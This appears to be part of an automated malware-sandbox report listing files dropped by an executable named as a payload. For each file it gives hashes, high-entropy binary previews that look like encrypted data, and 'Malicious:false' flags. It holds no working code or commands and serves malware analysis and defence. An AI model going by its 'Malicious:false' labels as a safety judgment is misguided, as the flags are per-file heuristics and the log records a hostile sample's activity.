                                                                                                Entropy (8bit):7.936786243990989
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6bjzDOUnq3ar+VelZggr03pIT5pMY9TZYT+L2gPzDLHhkwRV7cLC9bkb8ZHfVRtc:UjzpqqSVgr05IoYZZYahPzDtkwbqCCQe
                                                                                                MD5:2944A5930574304483339821F55A4725
                                                                                                SHA1:D1575F1EBFA90FA23446F742CD0361D6FE91C737
                                                                                                SHA-256:E202B3B119500DCA98CC7642B3E115F565C70E3FDED1367EF131F09FE383C0B5
                                                                                                SHA-512:7D3CCB4D864C7FB9F780FEEA410E3199985F2BE7DAFF6A0DB331673A079FC0FBC802194EF80637735760A164B5323406EFD1B8294A6917CA5E4FE12322B77DF2
                                                                                                Malicious:false
                                                                                                Preview:<?xml............Dh...{i/><Q.8...\.']@ez..Y....Z..1.e`f..m..5....E...l..n%T.....]C5..u....{....n....y?.|A.Y."....)...3........./7......|...c.&|1&..m.OT..}......;.j.Z....O.'.........`...+_..#.......t.. %.......bU..z_....L.....j..<._...`..O..U(R..-.#..6..).a.@.v...u.%..-.U.O]6.#.H....<`.m..c>.e\....nD$O.U$*#.E.a...S.....:....E...CU....F.....6.P.u,.}.].<.bM)....-.....CKe..].^6..LZ!9.R.l'Hn...k+.G...?.n...77.~].d.A....W.<eh.OgE.t.E..a.S....C..dv.2....(....G..V.)........$P.F.zHG?.l.F.V....uG..2\.{Z..*.@....3...4....s.'...X}.=....q.Y.".itL.Pv.6...x..r|5?H.F.C.:.x.{..e...W..[....^.sdf....L"...M!...~..J45.5...@...c..%...l.W':.....5.|.t...5........~....Ba@.}.i....w.t..(...G..2.."n..o.....E..E...`_..W... .....J.....E{..Ni.P4.-.....9.kB.W..M..j..... .M....>..$..o...%.d&..@..pa.C.k....!7..>.r..._u.<..]c......?.R'....X... .!F.R.Xt...O...(.Z...b.....0t.n..O.0~.OU.T4....w.8........EY&....z..jA..E.."D<..Je.-..9..Jj.e.w."#.yq.5Y..F[.(..k...Y5...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3017
                                                                                                Entropy (8bit):7.9384667173681045
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:SN/ebJJber31CI+ErngVkzsxmOosOz30fUuXnNGIRF/4Rbz8Ic6LD:SNdr3L5rgVkzsxmOG3+ULIRF/WwIca
                                                                                                MD5:C26D943A7877F3079498BC7609B786C7
                                                                                                SHA1:D11803C66BDEEFCFC25D7297B58630452BD9626E
                                                                                                SHA-256:17EC925A9AC84D8264F5DCA07B2B82F4DA987A9CFB22D52254F4F3FF3EE70CF2
                                                                                                SHA-512:AE65D8AF67E9D19D41F84369228CADA39111090EFD18EF67CA01023CC10154A9A0B0533923D89A9904F16C9788FCC662E8D20C8455956A50BAB9843E615A25F6
                                                                                                Malicious:false
                                                                                                Preview:<?xml..+b@9....r..abA.z...._CM].....&...C.!h.ME..$.K...H..t..k.$;....{..OL.....M..v.Go..O.X\..@......a?.s.P....d..}_....,..5......g....~7..sp.l*.A.8K..........lwR-..@Z....l.%.*....a{.n"+...../.e.?....K..Px.v....(.....K.......>.0yd....4.J"O..[....Nl...1][..sP.....xX&*...O.U[.' .b...BO.0...|...r~.{..|......1..-(...E+..... ...gs..$..1..#......t.,0.W...C..Pu...q.{...z....k....U.[a$.'...Y..1...L+{D]/.lX,...l.....K.S..K.}.Yi.....M..<......3.f{..9uM.......]k.Y..=.p.%4.P*t..Q....6...[c...m.H.m..AK..`...N......D.......8H..7......C.L..yI. ..'.e.O.US.ixw'#.u~_..hHjj.w.v....P,F.......).0.....m>..e......= .(F..3.53.-.s..uJ.}....j}._..0s.....).jD............#..........]..*..{..[..9.+O...$....*@.Jt...R....d..`|.n.9U.J...F....q.....A.n.EW...~..d..6L...,.....g...f...A....8eQ..)...Gn...]'*.4.......Rx:..-".R*..3.~h......f....Q..@...yhR.*..5..6.I.r.S.5Z=..Raep...Q...H..4....M.q....{>.s7....GBV..:...J6....).T[.wUu.0.#.;..V.zk..O...`z..Otx...aFz...g.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4639
                                                                                                Entropy (8bit):7.957833536717566
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:s+j+Olk3y7fUr4o1XhkiNyP25BHRafzS3xPuQb3fNHb7lje7RQUk/Ns:NUyGhYO51Uzwx3d7lj4Q7/m
                                                                                                MD5:0C567A8A4DFDDD3BF902140610D7398D
                                                                                                SHA1:B3B4B44D79229A297F904A8827B8BE7652FDB74C
                                                                                                SHA-256:556FBB904F81F28C70A584F135F120DAA525508F9D778BEB57558F6BAD9BB0F3
                                                                                                SHA-512:1CD0134126AF30EF79F67D888E5279AFE367DF11104AD99B960C1928D084D44C01B87E3EAC407742DE0708991CC8106074EA4864690F13B7CBD2B2838668F825
                                                                                                Malicious:false
                                                                                                Preview:<?xmlf._..u.v.(f..c....E.p..E..P......d9...T#S..K..|.`..z. .e.M..m......7G.c.}_.....9...`O.".\........'Y.C.}....tw....u.^........g.]{...]..h.O.*..u.E^..@.J..n.Q.J..F.0p_...........F.;...8p..%.@.^....in.?.&..9.!..R5.8..p....<4\8.~.8fg..r(.Y+.G.......n.....9..b.Y.'s{........n.L.<sDN..C..~u.......e... .vC....4....q..&...A.x.~XJ.z.:..N...\~...w..._.E.De>.>!g.....@N..>3.|....|-....'.+t+.n*4.?.H.V........X.+.....k..(..K..V...{!G{.'....j.@!.SS....i.]0.....>}KE./.p.8$.4I-.J.....A.q..D.z..XU..2{.;=s.J....._,.K.I....B..o..,..9L..&".../`s.+...G.[.K*..|..@..S.5...*.~\..S..}...ecR.:.Gg..U...9.6.S3......$:.TO...gGNL...<r..m.g.r*....yL..n.E........CP.M...Z,.......s.1..2...<y....$hJ..b.Y....*.>y7.....UQH...-.zgq...g._d.z..`......}l........e[....b..ba.......R.TY.v.xPAj+.]....R-5D..V...qa.7.....Z....t...I.4.0.)(.$.-O.1*-....u*.....*ST.TB..q.KM..N.ma.....P8..c.8.e.`...}..Z.N>...m.U....&.i.).(SL.If..i&...6.u..g....k.....F.EI8.]4.VM.k...BF..9m.3..W.......5.V.ca! 5.]
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1329
                                                                                                Entropy (8bit):7.8427793200438245
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8ok3fcz0bjJGJxaXq7wNrqVj7gMgDhS/1ncZlMFJdlwDZvPVV5qqnK5x3bD:Xk3fczmjJcx0NSjUxtOIMFUtV0LD
                                                                                                MD5:3FCC252474B0D057980195FD55E029C8
                                                                                                SHA1:F32E949E3ED09AAB3907BEC953B807F822B9F485
                                                                                                SHA-256:0A36962A237D990E148EBB0EAA5BBBAE32ABE19D69A511E3E09A82AE7287D4ED
                                                                                                SHA-512:E0A2BF7179AC33512FE1241106402350284117B19E602B9C9D2B573D731327BDB40DA6504DB2808CC559DAFB61BC46B382793DE0110680D4F2129BA3B07ECED0
                                                                                                Malicious:false
                                                                                                Preview:<?xml|....B...}.........i....3.NfM..L......5.d.D8.,.......:.J......IkxJ....m..".pX.P.Sx.1.$V[k..>_..V.I.f.]..;.Y.=.<..O.)./IZbb......Q}*.Mn+...N.....@.L.C..E5.-.....'~.[..m...9r.h...Kh..d..HO...G..D.......g...=X=.2Q.Bq...U...\]..W..i"&..M...=...(X..a_...Xp...5...!.Cm.\neZ^.Q._E.-....d.5`.....M.j.)Q.Z.v..mvS...B....5X....+..b..Y..!.a.....)^......W.7../(...@.H...O..&..:`).......=......%.k.U..`...Q.E....N.....7jX.b.y..;.^}.S...?....k.vpc.n_s7.r.-...Uy...v..M'..6.........f....e.C..A..xy.=.cQS.rAW....#..{......D5.>2.\!.K.S...&..,.B...z.......(s..s..h...|..~.tO....8.........^.....{.lyb...8Ax...T%2Y.s'cX.by..T.20.+....A.WX..8.007pDpx.. r......9+.....X.S.3......%}h.o..<$...`.v.....D.q....E.Jh.d-.1m...%s... G.C6B..._...z-u.E!r..,,...&..R.x.....+..+Bd...AR.'V...@.X3..........K.Y..^.R...NS.@..d.!..@...&p.4.Y....1hE...6......m.....q,U~....C1.E$........3..Rd..T..O. }...#.C.Yv.?.~a.e...}fz.-.|`....?.".zi..TU.......,|.....-...@.<.P\*r..[..q.f.M
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1395
                                                                                                Entropy (8bit):7.84647870714535
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Lf2z0i796V1eNTChv9bQOeEV5wYq0PanB3p2D/4BE7S/K9aHIFAWNRdQJP1lrx3X:L8N96Gc96T+anB3cDGwKORdU9LD
                                                                                                MD5:5FE765A67CCE5DEF255CDFE75C6ED462
                                                                                                SHA1:F4F92FBAD39FE8933027A95057C661131243681B
                                                                                                SHA-256:62914B9CA4CECA25476546AE696C2B2798432A1956695DDF9BE88B07BEEEA660
                                                                                                SHA-512:03E3F329939509205CA205B93070C5A6F443A3610F4B0BC52EF1F61DEEEA060A419A276149333FDA6A94A780B09BAB09638F5E7B9189758737BE0994141E410B
                                                                                                Malicious:false
                                                                                                Preview:<?xml..!$...>@....;..'sVm..z....."..D....rf...>....L..z..i.]...P+...eFXI.GD...e.R.....I..m.B...w.o....AZ..G..K...........3A.....-....u.......w..@..].......5.>..M1..+..A..X..../`J.{...f. .}p......o.r.x..Qj.C']xa..B./c.N.P.%8.:&].J..zL.F.....sK.t.\..K........x..CgWF)[....O.D..^..c.i58..&..........U....d:._.aL..s,.9!...p.a....n...*...V.....\....h..U...D1u.s.....5...m.....s..n..5..C...3j........1....r.J..j......... '....)h.......-u..a,.....W...|.......,......u.E.,..K.Kw.H ..9..R..>.T...%\...-l...5......x....v*._...)P|Rw..KT..#...t.1.....|9Tk.R..uz..z}.,..V.M.A.M~B-....j.>|.-=Rs.B..o.)..rGP..!..CL2x..h#...t....0MD_I......&=.-^.]..a..2D/y..........M..........3........`NZ....d.h.+-....b8[.Q.ktS..}..sW.^n.......]..A./,..=..?k4..o.,C....T.c.>...7o,d...yQ,.x..&.Z.......@y...v....V.*V}......!?........tx...gS.vB.....oEp.H.....'....f.0..v..Q* +c..!Z...U1.Y.....X.....}.J......p]....p.q.d.m......`....^..)...R..'...g.5.Jh..0..^....iF.7hL....x......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1124
                                                                                                Entropy (8bit):7.7729022931800795
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:9v4Co06SHLTJd/3tSW+dABvVHFfPNs+jq+L96dx3bD:ZNo0NtOd4lsKv9ALD
                                                                                                MD5:CF9B368FACBC8B3F92F549ADB523D0AF
                                                                                                SHA1:1FF15769294A22142E3823A4A7BEAEB04A3E4C8E
                                                                                                SHA-256:9FDCFA615328DA0E5061602B5C7430EA3D59F0E15D917FB65538C64080A8D1B7
                                                                                                SHA-512:6A3C86DDBD07A5F4D66DDAD65C3F814B4C24D56425AFBF58C1B65CEFE9D64FE290B9B3DAD3C729A5919149AE5137653124D13316B28F76C1808AFA7F7722EB71
                                                                                                Malicious:false
                                                                                                Preview:<?xml..W.S.....?...>a.{.C.m..]..2:X#....\G.~..U. c..."......i...o...-.S..J;...f.z.....h.`E..-.v..<.4.A\%Z.^......\2..DeN=...-..|......\.%.;.7..i..#.&.%.0/.g.+(........ZE.....4ue...i..^..\7k.n...#..D......@...eBJn.Ot.e.b.i.e4~....O..Y..[........n...L.\...e+....2Y.=|..BO..f.."..........\...gO.O.....Zm.....L.P...p...r.......h;5..[..}....-..1b..y...o.:D....#...3.....?.9*n1}2..Y...B.....mn...R%.7Q..b.....+*N.....~....}.....9.73....E...^.....F.1...$N.[..D.Z..%...*..:.I...iO((.,..".!Ty.5@x.E....c`.B]4S....].^...K.....M..AN.N.:.s.w..].S./I.....ppc...i.EB.;=.._W..V..HK,$....E..]. '...+...-.]D*......w....\..`-...{..D...{.i.g...9......PR..3...|..kE.x._.H....Tt.e...Y.O.5....Q.\na|......P..........S..B{~.-!+.3...{k..a.#s.......f>.#...1ze.N.D+.lJ..hhWb4{co.*..(..9 .~.8.'LM......H...W..+.X.a.qm..qw......-.At..<.d.n..I.h....+..U..[I.8..+P...m...?.._.Z.f. .}.Q.. ....r....*..Z..H..,..>bx`x[..F..B."...v.N...l.K"..7Q.."NW..k....*.W....Qq5....F..b,..!...^...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8769
                                                                                                Entropy (8bit):7.972968502635876
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:uBaFf9+yx3+ahw2jmtmI5UsQq8aLvVT7wc6DAoqhWd:uBaFRvu2bsQaLqc6DCWd
                                                                                                MD5:80441E2729F43E3DEE1CB1A5B9820C02
                                                                                                SHA1:695EE832649DB79131253698C247707229E53DE7
                                                                                                SHA-256:1F21FF8635890560DDBB2335E2E1EE582B75CE5338E603770745CBE49B518629
                                                                                                SHA-512:C6DE1FDE2AC7EF4BC3387019CC989023D6A3129BEBA5EEB2C71353CDF74C01E3F35CDCA190A8E9659EDD83E5B49A59E29B90918DF05C9638B513CDD88C6032F9
                                                                                                Malicious:false
                                                                                                Preview:<?xml.V...3..vK..i(L>W..b.[)C#.....P.....'2....5.7.Q...M...].C..WT.n3np.J..h+&....Ht..g..k.~.P.x..-.S.6w.U....5.d. ....[.~0T..4..E..,.'.qCAk..C..._.........P.x...h9?Gg...'..m.G.j9Z.r.&-...b..}....-.&...8.a.kp.!..,..R...D..KG.>%3......c..dJax:.8.2n2...|...:=.u...e.]_.qo_.T....m.......]^.Z..Pq...m...H........qEz...M...k....D...J...J.6.XKK.Pp&._.[e..e}....{}L...$.!Y$B.x.V'.fF..VE.~.o...).j......F....a.;.'.U......U$X..lh8._.j.bo..0s.......=.P*>XuJn.\H.<..I....`w..6..!i...T.I.,..M.JM..W....+.'...tv..:.l.........Z>.......N..3,h...../~..7....B.[..8.5*..F.[..J..3i..}Wdb3'k+...q.....EV.2U.$3_.?6...M......}...vIBK..Y.}.pY...o.T.<,...X."....".i..d&........z#x....xj.0...9....99.:.m.v..1.MZ.=..%K.o.....C.....P.RU..c........d..5..i6..:-...3.X.....O.d...%.z.UN...".J..[....l.B.....C.B.VB.C*Mc*-..&.%.h.(..Qg....o....g...1nx>xD..uM...'...B.c..). j.s.=.d.i..'..g...'.WbEoB7..?.a..x.K..(.x....f....z.X....L....E..BA..K..-$,..g..c.A.....B7.......I%...iw$c..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5842
                                                                                                Entropy (8bit):7.962495920125809
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:wEBIAMIkVVau+oM/DhVez/yqJ2qu+U0dTqmoI6ae1vYaVQvB0VyIDfX5DLrQlNVr:wGkH+oeF672quITqpfQ5rIDfX5DLrQlP
                                                                                                MD5:8F3AD4C3E016AE8E6FD90828718D7248
                                                                                                SHA1:A0E7ACD3CAC15BC6C791BEFA41896C0DB00DC839
                                                                                                SHA-256:9EF3D9E90D026DCB703A745A5D9B5EE3F7F734A98E7961F60C265269C3AE0869
                                                                                                SHA-512:8A3E3FFB04F9218BEA4E7296A50BD760509731D67705B7FF0FB8A8DCD3BB3237C34D6D599F06616E0FA5800D08C235A1F2DD8A0CBB2DCD45A8F8C4E9431EED3B
                                                                                                Malicious:false
                                                                                                Preview:<?xml....1...%..2m.g.y5yw.q!..S..Fx.|............V.uh<....1VT..h,V..-.nk..15......b..L....O.`*..i.3+.Ny_.4W].df.........J.y....S.cQ.*..k....Y.C`.F..`S.hRuY...7&........P..g..&..7TS.R.EU.o.-...wd....G|....zm.]V.;A...@..U...jM.....@]...|y......V...L`u.......f..^t.B..'].y.....w...s........n...Z.fq.%D.T.t...=...U8.?x..%N....:A......^v.0..J....fn..hK.....b.....cP..s_...||...ui.8.&....w...W4.~rB./r..v.x6.S..n7..........JBP.,...m.(N..d./.......r!.p@..5?..g......r ...0.,1Ku.,.t.......y*..T....Y..........o8.%S..b6i.Y....s).......Q<$.V.V..].F....c....q.|.9.k...IQ.....th0.P.~.0v...;6..\.r*?.....g..Ktn...j...S..N...]#...`n&{\.F...Z...d.......lb..&.\.G>XS..O.+.5..Ah..h..6N..4g|8%#..)K.y..y.R.Un.W.....Bv...."&..~...J..HK...Hd.+.D..<.Hx.I.y'.?...u.L).E.....#.6..N.)-kd:..v......d.y...E....$.B!...:A......H.&f....`.GW.D/x\.7.R....X..S..b}.F..,...-`.y/3.nyG........."o....h12.vr......9..V...|>K..I..FC..........J...|.u..._B..!|...S7z..r.G..g+.....f... ..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4787
                                                                                                Entropy (8bit):7.966586700738814
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:TzzBSEZvEW7+JlMqfVaXezDGYqVPEXcxVA+h8A6QN0HdlG:TtZn4NaXezDGYkR3A+h8AvK6
                                                                                                MD5:31FA6670C8075AD1E44E901265C7E830
                                                                                                SHA1:074726AE0D765C71796E91CA317BDCF3738B37CA
                                                                                                SHA-256:43144F29C545FFF9DF5307E695A663D7C30ABBE99C43410891A8B073DBF5E6BC
                                                                                                SHA-512:F591DDFBDB3D24D14EC059F2F61F950E8682EE80F3090253CFA9B6F10985DBE72AE4166CC62B571387DBF180F339FFEAD9F1878A1D79E7183FA6482D023FB2EB
                                                                                                Malicious:false
                                                                                                Preview:<?xml#g..E?+t........a>.....O.."....[....y..V.....dv...4.S-=...D'.R:.A.Bs..a...]..N......e...5.d.....0.....k...3.I..s..7...s..%.)s....s.^...>...}v...s..@/.t..a.... ..o...t..[.$w.(V%7.8.w..7........L.9 .U\...(X.V.!.%..I............J..b-.....;I..ZF.".=~g...'....".=..0:...)...j.C..j..S<.N........K..2p...2...7i..~t\.6{G..^$vI........?..K]u.+...i.ng.A.0..$.i5..nn#...#.U..3.x...B...+.[p.h..<.sfA.EK.w...K..-,.........O......e.W...Y..pSJ...c?n........}.*.x1...DX.^F6...O........hr.....5v.i.-.5.F..N1Z.S+X.z...{.c.......C5.....W#.b..R.6P#$.l.G...w.... ...A4.MA. .!..D.Y..I$.Zm./..l(5.Sw..w./....g9...../u....?.n[wW..... I....vR-...BUx@..2h$$.Q..F.J..2Y..$N..!.8b.A[IZ.H7.wq.h&{..L/...|P..S...>.L./..Ia..a.c.'.b..z...8..). ..h...&....j........$'s-%.@.t.voF.s.5..<.....$..nT..D...ac..>.......rP..J...^.a..B0.^."tp.l..i+.1.?......Mh+C.......o.D.k.{).kp...D.uSO......L.A.<.`/ ........4.l.].~.U.....y*.~lD.;...y(O.esO...v...Q.....bg.=..;..l.?u..F....&..!..@...(
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4786
                                                                                                Entropy (8bit):7.957842820084665
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:43A24SxK3jKWkX3BBrlcBMMVV9oVKty+YmAG0GDYM8WiIy:4w2ehERlcBMMwKtPAojNm
                                                                                                MD5:04D8FD9C5137FCB567002672EE8F0CF6
                                                                                                SHA1:75ED02823F3FE9922B33A417D7BC9D5D9C0A0D26
                                                                                                SHA-256:1FA6167439822E616C4F9D39B5086E811C5DBE5755E0E740B15A338FF507C56F
                                                                                                SHA-512:80A1C832817FB092E02E440730922275EE55968AF1BCDF84EDBFFED7114651B11E57BBF93074B3F074E2ECAED301E409668382D3F0368E1617B4E4FEBAE5F678
                                                                                                Malicious:false
                                                                                                Preview:<?xml|..../....2.Ln... e.X{V.'..Vo...S..L._..Z.X{.+....T...R...!On..7...@.3.%.,+:..8).`=V.N.J........_.?.r#...Ym."..\..:.......Q.4t3.."......G-.S[E.ga>.,_br.. ..e..b.....Z..B..=.H#.0.}.HZ.MR..........@......-/....]R...u.g.E.9..c.TyS./.;.....<O...8..#.bA...\J.VH.H....R..)...).......X...l....c......W.uiA..u.%&.T.jk..i.43M...P.#/...6.RD.M..bk.)....."il.fJ..M.K..u.....|..1..x.f9.,.e{6...om...{.%{iJ.......R.7z..Y|....}...IyP.+.b.~c.Mq5.@....f.........\..[.VY.ou..J.X. _.....Y..+.gHv...&..2....+<i.......t....y|[...8P.v#H.v....%.y=.STM..F...1..h..).....h..c..K......&....NVS.g.1........v......$..@.M..d...'...9e!..]y&...O....:.>.\q..q...j.n.G@....[.RO...#..zi.V]........7.~..9.~5...H+|.e..\.*!i.ui-..p.lg.5W..H. .v......4gqb....#.M.9..0.MI)..i`{N.W.<...HQ:..\#.....j...3....H%.....y..u...Kn...X#%....<J.gPk_.{.W.kL....".Q.]......A64.}X.s...R...r.....~....r.C.1...?...w=......i$...b......>X..0.2D4.L...=.....gNeOIQ..f..Y..z[1.K.&...%.6J.yz.D.~...@-..+...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3030
                                                                                                Entropy (8bit):7.9408323627380675
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Mu+PEm4Lk5DItshm+KBrSAke00RamPH6/nio86aSIY35ATk9mbB1JAPK60Q18LD:M4fLsDItn+iIwB6iolKYpi
                                                                                                MD5:DE2C7E787E03AB2145927582157C1E81
                                                                                                SHA1:7E078C55C76A44B181BDCBCD8C25DEC2E91915E0
                                                                                                SHA-256:4B62594549B31BEF5C07E00651999BEDED70B9B50FB5FE7162802427AA3BFB5E
                                                                                                SHA-512:304C45558F32E3AB163BA310E865EACD0F7630F90D7B6391636AB66398ABC4D12E04D27109A9238C34E247802D0D680282B438524824BDB3CE2B0F153DCC32E3
                                                                                                Malicious:false
                                                                                                Preview:<?xml..Da...U.(.[J.....$.r......ai,.og~\k....#U.3B.%.....2BBCf9...m.7..'....e4......G.n.S.d8v3..`._.9....~n.13.(.....<...V.../V9.L..C.},.....y.x..T.P.zM....d..H.....&..J872....q..>5Y.}.J.$.W.w.Qw...g....>|19.aM.....cU.f/...sz..U`H.H*..........O...C].....2.....~Y...N...f....Z......)u..W..{.....YP...L|..tB@..?..>..g..k.}x...7*J..g...{.9....yS.X.%...o.>.V.v.......7...O..a.L=.u.S....C.....$..Sg.;G.8..)!..'@l.).#.".N..(.d..(=F[...K..^.j>Z.x.A.F[F.Z....$p. Gg.m...%.P...M.'.WcY^.Q......~...z..E...@.$...r.1.._G.......|._.F-...Mc......`.e.......Z..E...i..D.5...."x......V.h:..... a7PI..<..rq..1........m.a.....YH.^mq..!.>7./.3.....z...(p.{..Q.XV.a......X.UJ.A............o...*...s.+'K...zmX.:vJ(.%...i...'..,.ZC.r.e.H.Sj.. ..).......L..D...y.]...x..f+.OW^e-.....#o ...u.9t...T..d6....u.....z..@Uq{.g.<8.-O..9X......*....(....h...%s.....fQ.>T9L...k.......w*....&........b.C... ..j.....'..M.Ku..K......{lM...B..........d..v...r.B..-.w..^.].t..O
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):789
                                                                                                Entropy (8bit):7.690239332152103
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:GuFhRqT9avzRnFh5qWmvd1oo8gICwfgbvxx3bD:GwhJdFh5qWm1ev2ggbvrLD
                                                                                                MD5:4D77F844BA0195696BB125F8F74D13AF
                                                                                                SHA1:CF131308BE479283DE944BB6B6FC93E398933707
                                                                                                SHA-256:46287718EF0E62CBA87B966B84736D29179B7F75D5BF4DB96F29AFAB12478986
                                                                                                SHA-512:22348CF8E3F85E18E73D714882AAF32B46E8141444DC9E1C4C58B9F22C5ACC07F6FEB03927B7DD5FD709E163CA7AC9FBE84B017766CEF203C8A0E273E57E8339
                                                                                                Malicious:false
                                                                                                Preview:<?xml|.L.{........^...2..@...8.7.1.G.T.....k...e...+.T^.........2IdnE3K}.7.*.=...6.:.|.\...6T..q.yb.T.....J...~..W.8<..m..D...6.kh.s....l5...i.t........Y..W...IP(7$;...u..X.....J.*...5.....rC..u.R..j..b..r]w.d.]...G7.y.<.I..L].W.I...Y.(#Y.j.W...+....=Mv../e.....dv2.2..Gi.?..8pBCz+.K7.r..}J.=.........._0.Fp...T.l...._P]...%4X'H.A..{#...+.....f(....T..k..w..|....D))Ht.j.....B...{.P.JZ..tp?..l.12w.9..Q...0.. tZ....O..}.....Xe..qXq.Y... .7Q.j..W^$..*Z......Z...*.q...20E#. .......4.uf_^$..B.`*...S.?..Q...2...It..f... .......`W..(.6...7.D0..)...m..AV..ft..cu....h...}u.8.kw.L..w..YK.J...2.pv..._.s.O..G.iV|.*.N.F.W..p.}..x...;.x$...V.....5.P..M.i..w......kGD..x.]..Ab.u.jj._..W...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3017
                                                                                                Entropy (8bit):7.9396080414358465
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7eIsPXsmk01mO2TwihH/9Lwu2SjmQdN8L23C+bFj/MQ9X+F23U2ZJX0794NhZ1Dn:7nsVkd7wikQdN8L23CGp/MQ9X+GZJk7E
                                                                                                MD5:5D95D4FD4E2D8F949E5D0939EEE6986F
                                                                                                SHA1:53B2B68F5F9D7A46CC8737EC58938EC6BB35E22A
                                                                                                SHA-256:65E4F31D97E8294669FCF5E718AD9F727D52461BECD87F8AD08AEEBF0E27B7AF
                                                                                                SHA-512:0B8DCA2466C7DF3BDA8FFC44544F3055067C77D1440761B7EC0C7576523F35A4D8FE10A6F97517E96EA8C8108CC64FD4BE69C994F10416ECBB1B2F2181F87FE8
                                                                                                Malicious:false
                                                                                                Preview:<?xml..p...6L+l.y.C1...S....8...#..0.ip..`.W.},|.....a`....|....j........2..5.v.%GvX*l..7......j}.G.gT...8...r`.k/.x.._...\.MRl.h..j..b.3.#G.c...^)'..-..Z..<....t.$...H.>*....'@...oA.`..5.;S..o..a>.&..\.*....T...[..FS.......h..s+..G.ns:.....?.8..Z.t...d..\.7.i.....^.o..`k_.....1..I.36...A.B.C.-.N.`t.V|..Vx.|Y...W..#.s.3.3.....]t._..U."..e.._....a....mmM$.k..y....{...(n..4.p.......y......C.n.._5.^......rj....'.5\..J|k..S-C-?..U.....C.....).M.6O...g.X...3M..a.s.:...).a..f....kKW.I."....Q..?c..../L6oo}l....T.c1<0.......5...4E........yB........=.....T.?...]..4.......90.8......"..=S...+.....Gs.()..Sa..>......s......W..N8.....*.Lz>..f.&p..&~.....4...B.....,.%.*.(K..L.z..:..9..Ed...P..|...2;...%-...D.|Sm....-.&.d...<.Y....#.....Dl..|_A.>.=l.hj~Yw.-......-m..O....<ePma....e1..g.=..(:..?.o.48.........U.-."s.e}.i&...WOq......z.2.......ls..#.. O]/.....qy..Y.i..*.Y.....7...j..d..)..y..t...Ud...0F.....JrD%0%..*,n.Zr`.X<.h.a...P4.#...=.l.'...E.g*.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):823
                                                                                                Entropy (8bit):7.703707484026587
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iyscBerHTve3rlxi1G5P265tvakivf5M1Nx3bD:8WerHTv0RQY5PZpgi1nLD
                                                                                                MD5:E53058436E184142F2411EB1286AFC5B
                                                                                                SHA1:531AF72CCE062D629004A1CB0A668F3F610B0A44
                                                                                                SHA-256:CECBFC8D8689FBC977B94D86EA4A1B48524A7641C3FF258C0230BDC3438461BD
                                                                                                SHA-512:6949C15BF2E77BDCF1EC3A6DAA48BBC538E07265D9A800F10DB643F2B66A7DCFC8199F44F0B2144C2FAE68F2851BA604A2A9E58BE2C65CC3CC5B6AC16C8A3E9E
                                                                                                Malicious:false
